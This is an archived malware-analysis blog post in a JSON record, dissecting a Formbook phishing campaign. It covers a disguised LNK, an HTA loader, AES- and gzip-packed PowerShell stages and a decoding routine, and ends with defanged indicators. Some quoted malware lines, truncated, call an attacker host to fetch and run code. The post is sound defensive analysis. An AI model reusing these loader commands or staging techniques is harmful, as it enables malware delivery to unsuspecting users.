{
	"id": "cc244455-de44-495e-b89a-baf35926475a",
	"created_at": "2026-04-06T00:11:05.030766Z",
	"updated_at": "2026-04-10T03:20:30.691967Z",
	"deleted_at": null,
	"sha1_hash": "f0e416cae6054b199bdeb6e85af333187f9316f4",
	"title": "[QuickNote] Examining Formbook Campaign via Phishing Emails",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 922985,
	"plain_text": "[QuickNote] Examining Formbook Campaign via Phishing Emails\r\nPublished: 2023-07-06 · Archived: 2026-04-05 18:19:02 UTC\r\n1. Initial foothold\r\nThe attacker sent an email with an attachment named “brochure-for-2023-elite-events.rar”. This rar file contains only one lnk (shortcut) file named brochure-for-2023-elite-events.pdf.lnk. If the user does not pay attention and extracts the file, it is displayed with a PDF icon like the following:\r\nThe analysis of this lnk file reveals that it uses powershell.exe to execute an HTA script:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \\W*\\\\\\*2\\\\\\msh*e ('http'+'://thanhancompa\r\n2. Analyzing HTA script\r\nDownload the file pintu.hta for analysis. This file contains a VBScript code snippet as follows:\r\nTo facilitate the deobfuscation of the code snippet above, I have modified it as follows:\r\nhttps://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/\r\nPage 1 of 7\r\nThe modified pintu.hta file is executed, resulting in a VBScript containing a function that executes a subsequent PowerShell script.\r\n3. Analyzing the 1st PowerShell script\r\nZAA = \"powershell[.]exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -A\r\nThe script performs the following tasks:\r\nDecode the base64 string assigned to the variable $xbFz and use the first 16 bytes as the IV, while the remaining part is the encrypted data:\r\nDecode the base64 string assigned to the variable $HMTijTI and use it as the AES key:\r\nUsing the key and IV, decrypt the encrypted data with AES in the mode $BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB :\r\nSince the first two bytes of the result are 0x1F 0x8B, we know that the decrypted data has been compressed with Gzip. Decompressing this data yields the next PowerShell script:\r\n4. Analyzing the 2nd PowerShell script\r\nThe important part of this script is as follows:\r\nfunction Dlt($iZq)\r\n{\r\n $IBY = 6399;\r\n $dtu = $Null;\r\n foreach($kKX in $iZq)\r\n {\r\n $dtu += [char]($kKX - $IBY)\r\n };\r\n return $dtu\r\n};\r\nfunction RPJ()\r\n{\r\n $oUv = $env:AppData + '\\';$DASUDIl= $env:AppData;$GXIrywM = $DASUDIl + '\\blank.pdf ';If(Test-Pat\r\n 883.exe '; if (Test-Path -Path $DauGlabYW){pmh $DauGlabYW;}Else{ $ZbmZaJRahvY = zPg (Dlt @(6503,6\r\nIt can be observed that it uses the Dlt function to decode the download addresses of the files (next-stage payloads). By rewriting this function in Python and performing the decoding, we obtain the download addresses for the payload and the decoy PDF as follows:\r\n[+] Defanged URL(s):\r\nhxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf\r\nhxxps://thanhancompany[.]com/grip/883.exe\r\n5. Formbook payload\r\nAt the time of analysis, I was able to successfully download the payload; its sha256 is:\r\n00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4\r\nThe .NET payload, when executed, unpacks the final payload, which is the FormBook malware (this is likely a new build of the malware).\r\nUsing FakeNet to monitor the payload's execution shows it generating traffic to the following hosts:\r\n6. IOCs:\r\nhxxp://thanhancompany[.]com/ta/pintu.hta - HTA script\r\nhxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf - Decoy PDF\r\nhxxps://thanhancompany[.]com/grip/883.exe - Payload URI\r\n00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4 - Payload SHA256\r\nEnd.\r\nm4n0w4r\r\nSource: https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/"
	],
	"report_names": [
		"quicknote-examining-formbook-campaign-via-phishing-emails"
	],
	"threat_actors": [],
	"ts_created_at": 1775434265,
	"ts_updated_at": 1775791230,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f0e416cae6054b199bdeb6e85af333187f9316f4.pdf",
		"text": "https://archive.orkl.eu/f0e416cae6054b199bdeb6e85af333187f9316f4.txt",
		"img": "https://archive.orkl.eu/f0e416cae6054b199bdeb6e85af333187f9316f4.jpg"
	}
}